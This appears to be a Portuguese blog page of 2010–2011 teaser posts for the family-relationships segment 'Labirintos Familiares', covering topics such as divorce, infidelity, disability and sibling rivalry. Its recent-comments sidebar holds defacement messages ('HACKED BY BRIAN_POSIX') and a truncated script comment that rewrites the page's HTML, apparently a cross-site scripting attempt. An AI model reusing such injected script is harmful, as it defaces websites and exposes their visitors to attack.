Labirintos Familiares @ 12:57

Sex, 23/09/11

O conhecimento da homossexualidade de um filho não raras vezes traz algum choque. Pais e irmãos sentem-se abalados, tal como o próprio filho que revelou a sua orientação sexual. Frequentemente a crise familiar acontece. Como dar a volta? O que se mantém? Que futuro? Há culpa? Vergonha? Medos? E os sonhos? Como se podem apoiar? É tempo de um novo olhar sobre a sociedade, o mundo e o futuro mas, acima de tudo, é tempo de se reencontrarem enquanto família.

 

Na próxima rubrica dos Labirintos Familiares iremos reflectir sobre as Famílias com um jovem homossexual,  as questões que habitualmente surgem nos pais e sobre pistas que algumas famílias nos dão, ao manterem as relações familiares positivas e inclusivas.

 

AMPLOS

Associação Mães e Pais pela Liberdade de Orientação Sexual

http://amplosbo.wordpress.com

 




Labirintos Familiares @ 16:43

Sex, 08/07/11

Mais um ano passa e chegam as férias e o descanso merecido para todos os que correram entre rotinas e afazeres durante meses.

Se para muitas famílias é tempo de festa, outros há que vivem a perspectiva de férias em família com algum stress associado.

É tempo de enfrentar as suas relações, sem o ruído da correria do quotidiano. Voltar a estar e ‘refrescar’ as relações conjugais e familiares. 

 

Olhar para o cônjuge, filhos e/ou outros elementos da família, e dedicar-lhes tempo com alegria e criatividade, pode ser a melhor forma de marcar este período como uma ponte de fortalecimento para as suas relações.

 

Esteja atento aos Labirintos Familiares já na próxima 2ª feira, onde iremos reflectir sobre o stress e as alegrias das férias em família.

 




Labirintos Familiares @ 12:08

Sex, 03/06/11

Diz o ditado que “mais importante do que se diz, é a forma como se diz”. Efectivamente é na relação co-construída com consciência das mensagens transmitidas, em conteúdo e forma, que a tarefa de educar poderá ter maior sucesso na transmissão de valores, reforço de aprendizagens, co-construção de regras e partilha de afectos.

 

São palavras de encorajamento, apoio, aceitação e celebração que potenciam uma vivência mais positiva em família, mas também outras formas de comunicar adoptadas pelos pais na relação com outros elementos da família, colegas de trabalho e outras pessoas da comunidade.

Os filhos mais pequenotes ou adolescentes estarão sempre atentos e a procurar uma inspiração para a vida.

Comunicar acontece sempre, e pela positiva pode inspirar para que as crianças de hoje se tornem em adultos confiantes e  realizados.

 

Não perca a próxima rubrica dos Labirintos Familiares, em que iremos falar de comunicação e estratégias positivas para transmitir mensagens e reforçar as relações entre pais e filhos.

 




Labirintos Familiares @ 12:10

Sex, 06/05/11

São muitos os casais que enfrentam uma situação de infidelidade , ao longo do seu percurso a dois.

A dor instala-se e fica por definir o que fazer.

Continuar ou terminar a relação?

Aceitar ou não aceitar?

Até então a relação era gratificante para ambos?

Há arrependimento?

Sentem espaço e disponibilidade para dar a volta?

Continua a haver um projecto de vida comum?

O que fazer com a confiança abalada?

 

Se uma infidelidade encontrada pode ser o sinal para terminar uma relação, é também, em muitos casais, o ponto a partir do qual a vida conjugal se transforma, com um compromisso renovado e/ou recriado.

 

 

Não perca a próxima rubrica dos Labirintos Familiares, onde iremos conversar sobre pequenas e grandes infidelidades e seu impacto na vida conjugal.

 




Labirintos Familiares @ 15:18

Sex, 08/04/11

Ter um filho diferente, seja por um problema físico ou cognitivo, é sempre uma situação que desafia a dinâmica familiar.
Todos os pais sonham com filhos perfeitos e bem integrados e aceitar uma doença ou incapacidade pode levar meses ou anos.
É no momento em que a família aceita essa diferença e se deixa envolver emocionalmente também por este filho tal como é, que a harmonia pode voltar – com todas as adaptações necessárias às necessidades da criança, mas garantindo também o bem-estar dos outros irmãos e de cada um dos elementos do casal.
 Há uma reajustar da identidade familiar e um renovar do compromisso com o projecto Família.

Na próxima rubrica iremos ponderar as implicações da deficiência na dinâmica familiar e estratégias que vão sendo encontradas por estes pais que se superam diariamente.

Porque todos nós podemos contribuir para uma sociedade mais inclusiva, junte-se a esta reflexão dos Labirintos Familiares.

 




Labirintos Familiares @ 12:50

Sex, 25/03/11

A saída dos filhos de casa marca uma fase de vida conjugal.

Quando essa saída é feita de forma positiva, há um contentamento do casal, que se sente gratificado pela sensação de dever cumprido ao nível da parentalidade.

Contudo, muitas vezes a conjugalidade não é tratada ao longo dos anos com todo esse cuidado dedicado à parentalidade.

Quando o último filho se autonomiza, há muitas vezes a sensação de estranheza e vazio.

É tempo de reencontrar o espaço a dois.

 

Será possível reacender a chama?

 

Acompanhe esta rubrica e reflicta connosco sobre as estratégias e possibilidades da reorganização familiar, quando os filhos saem de casa.




Labirintos Familiares @ 18:00

Sex, 25/02/11

Muitas vezes há uma sobre-preocupação dos pais e educadores, quando se apercebem de alguma rivalidade entre irmãos.

A fratria é um dos mais importantes laboratórios de socialização, onde as crianças aprendem a partilhar, a rir em conjunto mas naturalmente a lidar com divergências ou ciúme.

São muitas emoções  e alguma rivalidade ou conflituosidade pode ser uma forma de as crianças aprenderem a ultrapassar obstáculos inerentes a uma relação de tão grande intimidade.

Cabe aos pais e educadores criar estratégias de educação para a cooperação e gestão de emoções, bem como  aceitar que os petizes irão encontrar as suas soluções nas diferenças.

 

Na próxima rubrica dos Labirintos Familiares iremos reflectir sobre formas de inspirar para uma maior harmonia entre irmãos e gerir e mediar as “turras” que vão surgindo no dia-a-dia.




Labirintos Familiares @ 17:29

Sex, 28/01/11

Viver em família poderá ser a forma de potenciar o melhor de todos e cada um.

O desafio, entre correrias das exigências e vicissitudes do quotidiano, está em encontrar um equilíbrio, apreciando o percurso percorrido, sonhando em conjunto e perspectivando um futuro inspirador, para viver Positiva-Mente em Família - onde todos se envolvem na co-construção de um espaço familiar positivo, com sorrisos nos bons e óptimos momentos, e suporte nos momentos de maior fragilidade emocional.

 

Na próxima rubrica dos Labirintos Familiares, Catarina Rivero convida Helena Marujo, ambas co-autoras do livro Positiva-Mente, para reflectirem sobre Famílias Positivas.

 

 

 




Labirintos Familiares @ 10:02

Seg, 03/01/11

A decisão de divórcio é sempre um último recurso.

 

Quando há filhos pequenos, frequentemente acarreta uma série de questões sobre o impacto que pode ter no desenvolvimento emocional das crianças e jovens. A dor é incontornável em pais, filhos e família alargada.

 

Surge uma crise e uma mudança – é possível criar um processo de separação que permita bem-estar de todos os implicados? Ou será um divórcio uma decisão em que todos serão lesados para todo sempre?

 

Na rubrica dos Labirintos Familiares iremos propor uma reflexão sobre esta difícil de decisão e de estratégias para a co-contrução de uma realidade nova e mais complexa de ser família.




Labirintos Familiares @ 13:06

Seg, 06/12/10

Numa era de tantas correrias, horários de trabalho cada vez mais longos, em que os diferentes núcleos familiares tendem a viver longe, não raras vezes percebemos que os reencontros das famílias alargadas se dão nos casamentos e velórios.

Aqui se partilham vivências comuns do passado, se surpreendem com o presente, e quantas vezes é possível recriar e aproximar relações para o futuro. Nos aniversários das crianças, nos Natais passados na ‘terra’, na Benção das Fitas ou no dia Mãe, as famílias renovam o seu compromisso com a identidade que vão co-criando ao longo do tempo.

A próxima rubrica dos Labirintos Familiares, inspirada no aproximar da quadra Natalícia, irá procurar explorar o porquê da importância dos rituais familiares.



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO